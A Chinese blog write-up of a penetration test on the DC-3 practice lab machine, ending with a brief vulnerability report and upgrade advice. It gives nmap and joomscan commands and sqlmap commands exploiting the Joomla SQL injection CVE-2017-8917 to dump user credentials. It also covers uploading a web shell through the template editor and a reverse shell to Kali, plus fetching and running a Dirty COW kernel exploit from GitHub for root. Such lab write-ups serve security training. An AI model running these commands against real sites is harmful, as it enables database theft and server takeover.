Dc3渗透测试

DC3靶机

配置错误解决

改为IDE 0:0解启动报错

![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/e209cbd6720d4c5fae17b134239b7946.png

信息搜集

在这里插入图片描述

判断192.168.57.224为靶机

在这里插入图片描述

Nmap扫描

在这里插入图片描述

识别到Joomal cms

Nmap漏洞扫描

nmap -T4 -sV -v http://192.168.57.224 -p- --script=auth,vuln

CVE-2017-8917 sql注入漏洞

在这里插入图片描述

Joomscan扫描敏感目录和版本

 joomscan http://192.168.57.224

在这里插入图片描述

复现sql注入漏洞

Sqlmal跑

在这里插入图片描述

sqlmap -u "http://192.168.57.224/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

在这里插入图片描述

爆表

sqlmap -u "http://192.168.57.224/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]

在这里插入图片描述

在这里插入图片描述

爆user表字段

sqlmap -u "http://192.168.57.224/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' --comuns -p list[fullordering]

在这里插入图片描述

爆用户名和密码

sqlmap -u "http://192.168.57.224/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' -C username,name,passwd  -p list[fullordering] --dump

在这里插入图片描述

在这里插入图片描述

需要破解hash,用john爆破得到密码snoopy

在这里插入图片描述

扫描出的目录登录

在这里插入图片描述

Templeate下可以创建,上传文件

直接创建木马

在这里插入图片描述

蚁剑连接

在这里插入图片描述

在这里插入图片描述

需要内核提权

wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh

上传扫描工具

在这里插入图片描述

很多cve

在这里插入图片描述

修改木马反弹shell给kali

在这里插入图片描述

在这里插入图片描述

使用CVE-2016-5195

得到shell后获取交互式shell

Script /dev/null

然后运行

git clone https://github.com/gbonacini/CVE-2016-5195.git
cd CVE-2016-5195
make
./dcow -s

提权成功

在这里插入图片描述

得到了flag

在这里插入图片描述
*sql注入**漏洞*

CVE-2017-8917

Joomla是一个基于PHP的内容管理系统(CMS),广泛应用于各类网站。2017年,Joomla 3.7.0版本被发现存在SQL注入漏洞(CVE-2017-8917),攻击者可以利用该漏洞对数据库进行未授权查询或操作,可能导致数据泄露、篡改甚至删除。

*风险评级*

严重漏洞,可以通过sql注入获取用户密码进入后台

*漏洞详情及修复建议*

*风险评级**High*
漏洞描述: Joomla是一个基于PHP的内容管理系统(CMS),广泛应用于各类网站。2017年,Joomla 3.7.0版本被发现存在SQL注入漏洞(CVE-2017-8917),攻击者可以利用该漏洞对数据库进行未授权查询或操作,可能导致数据泄露、篡改甚至删除。
漏洞影响:sql信息泄露
修复建议:及时升级版本

内核提权

脏牛提权利用—

*风险评级***High*
漏洞描述: ubtun版本低导致内核提权
漏洞影响:获取高权限
修复建议:及时升级操作系统版本
  • 22
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值